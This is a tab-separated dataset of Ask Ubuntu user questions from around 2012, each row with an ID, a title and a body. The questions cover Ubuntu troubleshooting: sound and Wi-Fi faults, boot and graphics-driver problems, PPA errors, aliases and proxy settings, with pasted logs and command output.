228484	my laptop does not have sound and the video reproduces it very rapidly . ubuntu 12.04	once my laptop was fallen and the wi-fi broke , lead her to repairing and when they returned me already it had wi-fi again , but i realized that it did not have sound . in sound configuration it could not raise him , to know if it was a problem of the horns i connected a few headphones and neither it was listened . because of it i knew that it was a problem of the software , and another problem that i saw , it was that the video player was going too rapidly as if it was advancing him . where it leads her to arranging they say that they did not touch anything of software , alone they repaired the device of the wi-fi . how i can fix it ?
228488	ca n't mount terabyte drive	i recently installed ubuntu 12.10 on my computer , but for some reason i ca n't mount my kingston snv425s264gb drive . it was there when i had ubuntu 12.04 lts and now its not . what can i do to get it back ? i tried using mount manager but that did n't work . i tried using recovery and that did n't work . did i do something wrong here ?
228490	gnome 3.6 notification area not on bottom of screen	about a week ago i noticed my notification area had roughly it 's own height from the bottom of the screen . how can i move it back to the bottom ?
228494	managing user status notification	i 'm has installed ubuntu server 12.04 and installed gnome-shell ... all ok , but on user notification menu when i 'm has logged , on right side of user pic have an disabled combo user user status..by default is unavailable . how i can enable this combo and , how i manage this user status ? any docs/sample ? an image : i 'm confused and believe that i do n't search correctly about this question . : /
228497	prevent vlc from starting a new instance every time a media file is opened	i 'm using vlc . its great for all media requirements . but i find this behavior annoying . every time i open a media file , a sepearte vlc window opens up instead of stopping the current playback and play the new media . this applies to music as well as for videos . could anyone help me in preventing it to open a new player window everytime i open a new media file . thanks in advance .
228500	how to get burg on 12.10 ( quantal quetzal )	i 've been using burg for years to get rid of the eye sore that is the standard grub interface . when i upgraded to quantal , the repository does not contain the updated information . i.e . after i add sudo add-apt-repository ppa : n-muench/burg sudo apt-get update i get the annoying response w : failed to fetch http : //ppa.launchpad.net/n-muench/burg/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found it 's been like this for a month , contrary to various websites which say it works . is burg being maintained ? have they created a better alternative ( such as integration with grub , like it should have been in the first place ) . how do i get a decent-looking bootloader ?
228503	is it possible to use multiple desktop environments on same system ?	i am using ubuntu 12.04 . i want to try out kde and other desktop environments . but i 'm not sure if i 'll like them enough to switch permanently . i want to be safe and make a transition in a piecemeal fashion . is it possible to install kde on ubuntu and yet not do away with the default unity shell ? could i install multiple desktop environments and switch between them by tweaking some startup configuration and then rebooting ?
228506	error upgrading from 12.04 to 12.10	while i 'm upgrading my ubuntu from 12.04 to 12.10 the following error is occurred in distribution upgrade , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead does anybody know whats happening ?
228508	how to have a window on all workspaces ?	i 'm using precise ( 12.04.1 ) and i 'm using unity . i have 3 workspaces . i want a particular window/application ( say firefox ) to be present on all workspaces . this is easy to do on something like lxde ( e.g . lubuntu ) where i just have to right-click the titlebar and select `` show on all workspaces '' . then no matter which workspace i move to , the desired window/app is present on each one . i ca n't find a way to do this in unity . please help .
228511	why does the julius speech recognition engine return a segmentation fault when passing a wav file ?	i installed the julius and julius-voxforge packages on ubuntu 12.04 lts , and now i 'm trying to run the julius command on a wav file called test.wav . i ran this command : julius -input raw test.wav but it simply says `` segmentation fault '' without any further information . i 've been searching the documentation for a few hours now , and i ca n't find any relevant information .
228512	how to run bleachbit as root ?	i have installed bleachbit 0.8.7 . would it be possible to kindly let me know if bleachbit can be run as administrator of my account ?
228517	newly installed ubuntu on laptop , wireless will not fuction	i am working on a new toshiba satellite c855d , and this morning it had windows 7 on it . wireless was working . when i booted ubuntu , wireless was once again working . i install 12.04 onto it , and now the wireless connection is no longer functioning . i 'm not quite sure what to do , and i 'm not terribly knowledgeable on the subject . thanks for any replies ! edit 1 : outputs for first commenter 's requests *-network unclaimed description : network controller product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory : f0200000-f0203fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 05 serial : 00:26:6c:15 : c8:4e size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.0.130 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : f0104000-f0104fff memory : f0100000-f0103fff and 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 9809 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:11.0 sata controller : advanced micro devices [ amd ] hudson sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices [ amd ] hudson smbus controller ( rev 14 ) 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] hudson lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] hudson pci bridge ( rev 40 ) 00:14.7 sd host controller : advanced micro devices [ amd ] hudson sd flash controller 00:15.0 pci bridge : advanced micro devices [ amd ] device 43a0 00:15.1 pci bridge : advanced micro devices [ amd ] device 43a1 00:16.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:16.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) does this help at all ? edit 2 , installing the drivers : when i get to the point of compiling and installing the driver , i 'm coming up with a lot of error messages . i will paste the output here : norma @ norma-satellite-c855d : ~ $ cd rtl8192ce_*/ norma @ norma-satellite-c855d : ~/rtl8192ce_linux_2.6.0006.0321.2011 $ make clean gcc : error : /lib/modules/3.2.0-34-generic-pae/build/include/linux/autoconf.h : no such file or directory gcc : fatal error : no input files compilation terminated . make [ 1 ] : entering directory `/home/norma/rtl8192ce_linux_2.6.0006.0321.2011/hal/rtl8192' rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm -fr .tmp_versions rm -fr modules.symvers rm -fr module.symvers rm -fr module.markers rm -fr modules.order rm -fr tags make [ 2 ] : entering directory `/' make [ 2 ] : *** no rule to make target `clean ' . stop . make [ 2 ] : leaving directory `/' make [ 1 ] : *** [ clean ] error 2 make [ 1 ] : leaving directory `/home/norma/rtl8192ce_linux_2.6.0006.0321.2011/hal/rtl8192' make : *** [ clean ] error 2 norma @ norma-satellite-c855d : ~/rtl8192ce_linux_2.6.0006.0321.2011 $ make make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-34-generic-pae' gcc : error : /lib/modules/3.2.0-34-generic-pae/build/include/linux/autoconf.h : no such file or directory gcc : fatal error : no input files compilation terminated . scripts/makefile.build:49 : *** cflags was changed in `` /home/norma/rtl8192ce_linux_2.6.0006.0321.2011/hal/rtl8192/makefile '' . fix it to use ccflags-y . stop . make [ 1 ] : *** [ _module_/home/norma/rtl8192ce_linux_2.6.0006.0321.2011/hal/rtl8192 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-34-generic-pae' make : *** [ all ] error 2 norma @ norma-satellite-c855d : ~/rtl8192ce_linux_2.6.0006.0321.2011 $ sudo make install [ sudo ] password for norma : make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-34-generic-pae' gcc : error : /lib/modules/3.2.0-34-generic-pae/build/include/linux/autoconf.h : no such file or directory gcc : fatal error : no input files compilation terminated . scripts/makefile.build:49 : *** cflags was changed in `` /home/norma/rtl8192ce_linux_2.6.0006.0321.2011/hal/rtl8192/makefile '' . fix it to use ccflags-y . stop . make [ 1 ] : *** [ _module_/home/norma/rtl8192ce_linux_2.6.0006.0321.2011/hal/rtl8192 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-34-generic-pae' make : *** [ all ] error 2 norma @ norma-satellite-c855d : ~/rtl8192ce_linux_2.6.0006.0321.2011 $
228520	bluetooth not working on ubuntu 12.10 !	recently i have installed ubuntu 12.10 . it shows my bluetooth device & bluetooth icon . but i could not pair or send or receive any files using obex push . how could i resolve this ? this is a big problem to me . terminal output of lsusb : bus 001 device 008 : id 413c:8160 dell computer corp. wireless 365 bluetooth the output of rfkill list all : 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no
228523	issue installing *gfortran*	i am trying to installing gfortran on my ubuntu system and i am following the steps mentioned in http : //gcc.gnu.org/wiki/gfortranbinaries32linux , unfortunately one of the step in the installation steps to says install using the following command : tar -xzvf gfortran-4.5-linux-i686.tar.gz -c / but the download link provides a .deb file which i have installed it . now when i check for gfortran , it says not installed . any clue ? how should i follow the further ? steps i have completed are : 1 ) installed libraries : gmp library , mpfr library , and mpc library . 2 ) downloaded the gfortran-4.6 debian and installed using the cmd . sudo dpkg -i .deb anything else i need to do ? do i need to create any path or symbolic link ? please help , thanks ! please note : i have no internet access and can not use software center .
228524	how do you restart a juju service ?	i manually changed a config option in a juju service ( alice-irc ) , now i want to restart it , how do i do so ? i rebooted the instance figuring that would do it but no luck . i then tried running the start script that is in /var/lib/juju/units/alice-irc-0/charm/hooks and it failed with a bunch of errors . so what 's the right solution here ? edit : the start script did actually start the service , but dumped errors out due to the juju-log calls . i 'd still like to know what the `` right '' solution is here .
228527	trying to create an alias in ubuntu 12.10 but its not working	i am trying to create an alias and i have added these lines in ~/.bash_aliases alias server-python='open http : //localhost:8000 & & python -m simplehttpserver' alias ssh-saad='ssh saad @ < my-server > ' < my-server > is replaced by the ip add of my server . so in my ~/.bashrc file these lines are uncommented if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi and in my ~/.profile # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi so i believe whenever i start the terminal my aliases should work but unless i run this command source ~/.bash_aliases its not working . also for the 1st server-python alias i am getting an error '' could n't get a file descriptor referring to the console `` i have looked into these solutions here how to create a permanent `` alias '' ? ubuntu alias not applied in bashrc but still can not make it work . i would really appreciate if someone could point me out what i am doing wrong . i know the problem is very trivial , but i must be just missing something . thanks in advance . edit ok now i know why i am getting this error '' could n't get a file descriptor referring to the console `` i should have used alias server-python='sensible-browser http : //localhost:8000 & & python -m simplehttpserver' i should have used sensible-browser instead of open .
228528	booting problem	i recently installed 12.04 on my new dell laptop 3420 having 8gb ram , intel i5,500gb hdd , nvidia 620m 1gb graphic card . firstly i faced problem with wifi but it resolved then i loaded nvidia current drivers after this when i powered it on ... ... ..it start showing blank screen and caps lock led keep on blinking to rectify this i have to remove the battery physically and power on and start ubuntu in recovery mode . to rectify this i uninstalled nvidia drivers but the problem ( blank screen ) again persist . now today in the morning i installed ubuntu 11.10 from cd . but again it given the blank screen on first boot with no recovery option . what should i do now or which version i should installed or altogether go for windows which is rarest of rare possibility for me . ?
228529	how can i fix this error file /boot/grub2/i386-pc/normal.mod not found	i recently replaced windows 7 with ubuntu 12.10 . i chose the option to replace windows so i am not dual booting . i am currently running off a flash drive since after i tried the install the error message is the only thing i see upon start-up . how can i fix this ?
228530	updating http_proxy environment variable	i recently changed my password corresponding to my username for my proxy . hence i updated the apt.conf and /etc/environment files with my new password . however when i type echo $ http_proxy or env which prints all the environment variables , it displays the value with old password . similarly for socks_proxy , all_proxy . any solutions ?
228531	what pdf editors are available on ubuntu ?	i was wondering if there is a pdf reader-writer-publisher-editor that can add text , highlight , shapes and general edit an existing pdf document . something like nitro in windows .
228534	get back to gnome/enlightenment from the command line	so say i accidentally hit ctrl+alt+shift+backspace and drop to the commandline from my nice clean engligntenment interface . how do i then get back ? i 've tried startx , xwindows , gnome but none of those commands seem to work . any idea ?
228535	can`t boot to win7 x64 after formatting ubuntu12.0.4	i got a new laptop sony vaio e-series with win7 . i installed ubuntu12.04 x64 but i formatted ubuntu partition due to some booting problems . from then i 'm unable to boot with previous win7 and recovery disk for win7 is unable to load though it is available . how can i regain my previous booting from win7 ?
228544	how to run/install adobe 's illustrator cs6 and photoshop and flash and indesign on ubuntu ?	okay , let me begin by saying that i love the ubuntu experience . it 's so amazing . on the other hand , i am a graphic design professional and animation enthusiast . problem ! i cant install my favorite programs on ubuntu , except for creating a virtual machine , the install either mac os-x or windows . i want to ditch these commercial software completely , so please for the benefit of most graphic designers and animation crazies like myself , and again i plead with you , help us out with a good solution on how to go about it , or maybe even develop a translation tool that helps these programs run seamless in the ubuntu environment . thanks in advance .
228547	can i get further details on `` application has crashed '' message	more often than not , on booting to kubuntu 12.04.01 , i get a pop-up message `` an application has crashed , now or in the past '' . i dismiss the message and everything seems fine . occasionally when booting recently to windows xp as administrator ( though not as regular user ) i have had an equally non-informative message `` your system has recovered from a serious error '' . should i be worried ; if so , how do i find out which application and fix the problem ?
228552	ca n't make bootable usb on mac	i 've been trying to do this since yesterday , following the instructions given on ubuntu.com 's official page here : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx i can complete every step without error . however , when restarting the mac , the flash drive simply reports 'missing operating system , press any key ... ' . from there , there 's nothing i can do except a hard reset . i 've tried unetbootin , but that wo n't create a usb that 's bootable from a mac . edit : i 've also fixed the partition tables with refit , but still no joy . any suggestions ?
228553	gesture to minimize window in gnome shell	i have ubuntu 12.04 with gnome shell chosen as desktop manager . i 'm getting used to how the windows are resized as they are dragged on some edge of the screen ( e.g . maximized when dragged on the top , split by half horizontally and right-aligned when dragged on the right ecc ) , but i 'd really like a similar way to minimize the windows when dragged on the bottom , for example . i know this is possible with a custom shortcut , but , i 'd like to do that with just a mouse . so , is it possible ? : )
228557	how do you install the latest release of miro ?	in the software centre the latest release of miro available is 4.0.4 whereas the latest release of miro is 5.0.4 . how do i download 5.0.4 on 12.10 ? i have tried following the guide at http : //www.getmiro.com/download/for-ubuntu/ ( and thus have already run sudo add-apt-repository ppa : pcf/miro-releases ) but it failed and when i tried to run sudo apt-get update i received the error : w : failed to fetch http : //ppa.launchpad.net/pcf/miro-releases/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/pcf/miro-releases/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
228561	install many fonts at once	i have about a hundred fonts that i need to install . manually right clicking every font file and clicking install , then selecting `` personal '' vs `` system '' in a dialog that appears , and then closing it is tedious . is there a command that will let me achieve the same effect in one shot ? ( i am using kde . )
228565	looking for a grep gui	so i want something pretty simple : ) app where i put a dir to search , and a string/regexp to search in the file contents recursively in that dir , and it gives a list of results . i do n't want something like 'tracker ' that runs in the background and indexes things , i want something that just searches on demand like grep , given a path . in windows i used grepwin which was pretty perfect for the purpose . i tried kfilereplace , seems a bit awkward . also tried the built-in nautilus search but it seems to only look at file names ? edit : gnome-search-tool seems more like what i 'm looking for but it does n't support regex ( or it does , but just for file names ) .
228566	12.10 boots to black screen	sometimes ( most of them ) , i get a black screen after the booting . it 's doing that since last monday after an update . i can get to the console/terminal with alt+ ctrl f1 but when i ask to reboot it does n't work . i have a failure in the process . sometimes i get a screen with a lower resolution ... and sometimes i get a freeze with a purple screen . and sometimes it works.. my computer it 's asus k52f with an intel hd graphics card . thanks
228571	how to change the ip address on my ubuntu virtual nic	i have a physical windows system , on which i run vmware workstation . on a vmware virtual machine i run ubuntu 12.10 and a lamp webserver . problem : now my local ip address for my virtual nic ( the one ubuntu is using ) has an address of 192.168.159.7 , and my home router only issues ip addresses in the range 10.0.0.x . so if i want to port-forward to the virtual nic , which has a 192.168 address , i can not , so my lamp webserver can not be accessed externally since the router does not know to send the packets on port 80 to the virtual nic ... how do i fix that ? the only way , i guess , is to assign a 10.0.0.x ip address to the virtual nic ? ? but how do i do that ? i tried to do it on the host windows machine with 'get my ip address automatically ' but it issues a 192.168 address every time ... thank you
228574	how to install joomla in ubuntu as localhost ?	i have installed the lamp-server but i stuck in one certain step.. for those who are not familiar with joomla installation the last step when you install joomla at a host is to remove the installation folder . here in action : the link of the youtube video is skipped the the last step ( http : //www.youtube.com/watch ? v=tp34whp8hks # t=08m42s ) were it says remove installation folder if i click the button `` remove installation folder : '' it says `` error '' and i guess this is because it does n't have root previlages . so i run sudo nautilus go to the folder var/www , and remove the folder installation.. so now when i try to access my localhost no configuration file found and no installation code available . exiting ... i am confused , it asked me to remove it and now that i removed it , it needs it.. : ?
228575	ca n't login as root anymore	i wanted to change my username , and tried out this explanation here : http : //askubuntu.com/a/205470/112035 . first , i changed the username in /etc/passwd to the new one . then i wanted to change it at /etc/group too , but since changing it at the first file i ca n't login as root anymore . is there a way to solve this ? thanks in advance !
228576	no boot after uninstalling ubuntu 12.04 with ubuntu uninstaller	install ubuntu 12.04 on a recent asus with uefi bios . uninstall ubuntu with ubuntu uninstaller ( os-uninstaller from livecd ubuntu ) the next boot after uninstall gives grub rescue which does not accept many useful commands . what can i do to restore the mbr to boot from windows knowing that i can not enter the bios uefi anymore , it stays on the grub rescue . how can i get back to the bios uefi ?
228577	what `` uniform ssh access to cluster hosts '' means ?	to setup a hadoop cluster following the path a ( automated way ) in the cloudera manager installation guide , it is required a 'uniform ssh access to cluster hosts on the same port from cloudera manager server host . ' so what dose this means ? and how to do that on ubuntu 12.04 ? thank you .
228578	filesystem owner changed by mistake	i ran this command on my ubuntu 12.04 by mistake : chown someuser / -r on rhel it would be fixed by this command : rpm -- setugids -a is there anyway to fix it in ubuntu server ?
228579	how do i start ubuntu without x server ?	so , i 'm trying to install the official nvidia drivers for my fancy graphics card , and they advice disabling the x server before installing , as well as making sure that i can boot without the x server , so as not to wreck anything . however , i seem to be doing something wrong . as i understand it , this should be as simple as changing the runlevel from 2 to 1 ? ( i am aware that all this may simply be me not understanding runlevels ) if that is correct , a quick test should be simply typing `` sudo init 1 '' or `` sudo telinit 1 '' in a terminal ? doing that makes the system attempt to shutdown , only it stops at the purple screen with the ubuntu logo and 5 white dots underneath . i have n't observed it get anywhere from there , i always end up holding down the power button . `` sudo telinit 3 '' has not visible effect . alternatively , i should be able to get there using the recovery mode , activated through the grub menu ? i have very little success with that . after picking recovery mode , i am faced with a set of options about how to proceed . both choosing the one with `` network enabled '' and `` text only '' , i get a dialog explaining that this will mount my / file system in read/write mode , and whether this is what i want . i choose yes , and it seems to report that my drive is fine ( there 's a single line of text detailing the state of the partition ) . and then it stops . i have n't tried letting it sit for more than a few minutes , but presumably this process should be comparable in duration to a regular boot ? i am not particularly fond of messing with any .conf-files until i am certain that i can handle things with training wheels on . so , i guess there are two questions : the one in the title , and `` how do i start a text-only session without changing defaults ? '' thanks in advance : )
228587	mount an image created from ddrescue	i know this question has been asked before , but following those answers does not seem to work for me . i have created an image of a usb stick this is on my laptop harddrive . how do i mount this image ? the command i used to create the image was : ddrescue -- no-split /dev/sdb usb_recovered usb_recovery_log what am i supposed to do next ? mount it ? fix it then mount it ? mount it then fix it ? and how ? update : what i want to recover are the files in the image . how ? i do n't know as i have tried testdisk and it ca n't find partitions , and i have tried fdisk and it ca n't find a partition table in the image either .
228589	double entries in the gnome 3 task bar	i am running ubuntu 12.04 with gnome 3 . all was working well except that graphics were slow and even moving a window on the screen seemed slow . i installed the fglrx ati driver . which seems to have improved matters . but on first login i had all gnome items duplicated . that is my task bar has the ubuntu sign , then says applications , then places then the ubuntu sign then aplications and then places . any application i run produces two icons at the bottom of the screen . this was after a reboot . i rebooted again . now i have 3 ! ! on the right each set of icons such as printer is also trippled ! ! see screenshot at http : //jetmark.co.uk/screenshot.png see dmesg at http : //jetmark.co.uk/dmesg.txt any suggestions welcome . reboot - > now i have 4 ! ! so one set gets added on each reboot . help ! ! i am going to be task barred out before long ! ! does no one have any suggestions at all ? or suggestions about where to look ? this looks very like bug 650154 at bugzilla.gnome.org/show_bug.cgi ? id=650164 , but this bug is closed obsolete . and not only that the code referred to in the fix , in file /usr/share/gnome-shell/js/ui/appdisplay.js line 129 is completely different to that quoted . so is this a regression ? still no comment from this board . i am up to 6 instances now , have lost my application menu since its covered by the other stuff . so , i make a file , then reboot and immediately after reboot , do a find to find all files newer than the file just made . this comes up with more than 100000 file , wow . whittling them down a bit , the following seemed suspicious : ls /home/mark/.gconf/apps/gnome-terminal/profiles default % gconf.xml profile0 profile1 profile2 profile3 there were 5 duplicates at the time so this seemed suspicious . i removed all directories beginning 'p ' in the list above , so there was just default and % gconf.xml which is empty . ( each of these contains a just one file % gconf.xml ) none of this helped at all . i am up to 7 instances . update 18 dec . still no solution . i discovered that the problem utility is gnome-panel . running gnome-panel -- replace gets me yet another set without even having to logout and in . i have 10 now . i tried to reinstall gnome-panel and wow , all seemed good . there was an err , that unfortunatly i did not not . i tried it again and i was back to many versions running . now i am unsure if i had one gnome-panels or none . i can get rid of all of them by hitting control c on the4 ( now ) terminal that ran gnome-panel . thats refreshing but not quite what i want . let me try this re-install and relaunch again ... no , it didnt work 2nd time round . hmm . control c out of that ( as now i just have too many gnome-panels visible to even leave the darned thing running . if i run gnome-panel , no options as sudo , i am back to just 2 , thats interesting . and thats also pretty refreshing after having more than 12 .
228590	copying files to usb stick never finished	i tried to copy 3.3gb iso file into a 64gb usb stick , the progress bar show completed but the copying operation windows does n't closed after almost an hour now and still hanging not closed . i 'm using ubuntu 12.04.1-64 bit does anyone experience this issue ?
228592	blank screen at boot ubuntu 12.04 - nvidia-current - macbook air 3,2	i 've installed nvidia-current using the additional drivers application in ubuntu 12.04 . i need those drivers so i can use accelerated webgl . after installing the drivers , and rebooting x fails to start and i have a frozen system/dark screen . below is the content of xorg.0.log how can i fix this problem ? [ 4.666 ] x.org x server 1.11.3 release date : 2011-12-16 [ 4.666 ] x protocol version 11 , revision 0 [ 4.666 ] build operating system : linux 2.6.42-23-generic x86_64 ubuntu [ 4.666 ] current operating system : linux david-macbook-air 3.2.0-34-generic # 53-ubuntu smp thu nov 15 10:48:16 utc 2012 x86_64 [ 4.666 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-34-generic root=uuid=b3d5ae2a-72af-4ef9-b775-0d40b5f80f9b ro quiet splash vt.handoff=7 [ 4.666 ] build date : 29 august 2012 12:12:33am [ 4.666 ] xorg-server 2:1.11.4-0ubuntu10.8 ( for technical support please see http : //www.ubuntu.com/support ) [ 4.666 ] current version of pixman : 0.24.4 [ 4.666 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 4.666 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 4.666 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu dec 13 10:18:02 2012 [ 4.668 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 4.668 ] ( == ) no layout section . using the first screen section . [ 4.668 ] ( == ) no screen section available . using defaults . [ 4.668 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 4.668 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 4.668 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 4.668 ] ( == ) automatically adding devices [ 4.668 ] ( == ) automatically enabling devices [ 4.668 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 4.668 ] entry deleted from font path . [ 4.668 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 4.668 ] entry deleted from font path . [ 4.669 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 4.669 ] entry deleted from font path . [ 4.669 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 4.669 ] entry deleted from font path . [ 4.669 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 4.669 ] entry deleted from font path . [ 4.669 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 4.669 ] entry deleted from font path . [ 4.669 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 4.669 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 4.669 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 4.669 ] ( ii ) loader magic : 0x7f6222467b00 [ 4.669 ] ( ii ) module abi versions : [ 4.669 ] x.org ansi c emulation : 0.4 [ 4.669 ] x.org video driver : 11.0 [ 4.669 ] x.org xinput driver : 16.0 [ 4.669 ] x.org server extension : 6.0 [ 4.670 ] ( -- ) pci : * ( 0:2:0:0 ) 10de:08a3:106b:00d3 rev 162 , mem @ 0x92000000/16777216 , 0x80000000/268435456 , 0x90000000/33554432 , i/o @ 0x00001000/128 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 4.670 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 4.670 ] ( ii ) loadmodule : `` extmod '' [ 4.671 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 4.671 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 4.671 ] compiled for 1.11.3 , module version = 1.0.0 [ 4.671 ] module class : x.org server extension [ 4.671 ] abi class : x.org server extension , version 6.0 [ 4.671 ] ( ii ) loading extension mit-screen-saver [ 4.671 ] ( ii ) loading extension xfree86-vidmodeextension [ 4.671 ] ( ii ) loading extension xfree86-dga [ 4.671 ] ( ii ) loading extension dpms [ 4.671 ] ( ii ) loading extension xvideo [ 4.671 ] ( ii ) loading extension xvideo-motioncompensation [ 4.671 ] ( ii ) loading extension x-resource [ 4.671 ] ( ii ) loadmodule : `` dbe '' [ 4.671 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 4.671 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 4.671 ] compiled for 1.11.3 , module version = 1.0.0 [ 4.671 ] module class : x.org server extension [ 4.671 ] abi class : x.org server extension , version 6.0 [ 4.671 ] ( ii ) loading extension double-buffer [ 4.671 ] ( ii ) loadmodule : `` glx '' [ 4.671 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 4.869 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 4.869 ] compiled for 4.0.2 , module version = 1.0.0 [ 4.869 ] module class : x.org server extension [ 4.869 ] ( ii ) nvidia glx module 295.40 thu apr 5 21:57:38 pdt 2012 [ 4.869 ] ( ii ) loading extension glx [ 4.869 ] ( ii ) loadmodule : `` record '' [ 4.870 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 4.870 ] ( ii ) module record : vendor= '' x.org foundation '' [ 4.870 ] compiled for 1.11.3 , module version = 1.13.0 [ 4.870 ] module class : x.org server extension [ 4.870 ] abi class : x.org server extension , version 6.0 [ 4.870 ] ( ii ) loading extension record [ 4.870 ] ( ii ) loadmodule : `` dri '' [ 4.870 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 4.870 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 4.870 ] compiled for 1.11.3 , module version = 1.0.0 [ 4.870 ] abi class : x.org server extension , version 6.0 [ 4.870 ] ( ii ) loading extension xfree86-dri [ 4.870 ] ( ii ) loadmodule : `` dri2 '' [ 4.871 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 4.871 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 4.871 ] compiled for 1.11.3 , module version = 1.2.0 [ 4.871 ] abi class : x.org server extension , version 6.0 [ 4.871 ] ( ii ) loading extension dri2 [ 4.871 ] ( == ) matched nvidia as autoconfigured driver 0 [ 4.871 ] ( == ) matched nouveau as autoconfigured driver 1 [ 4.871 ] ( == ) matched nv as autoconfigured driver 2 [ 4.871 ] ( == ) matched vesa as autoconfigured driver 3 [ 4.871 ] ( == ) matched fbdev as autoconfigured driver 4 [ 4.871 ] ( == ) assigned the driver to the xf86configlayout [ 4.871 ] ( ii ) loadmodule : `` nvidia '' [ 4.871 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 4.887 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 4.887 ] compiled for 4.0.2 , module version = 1.0.0 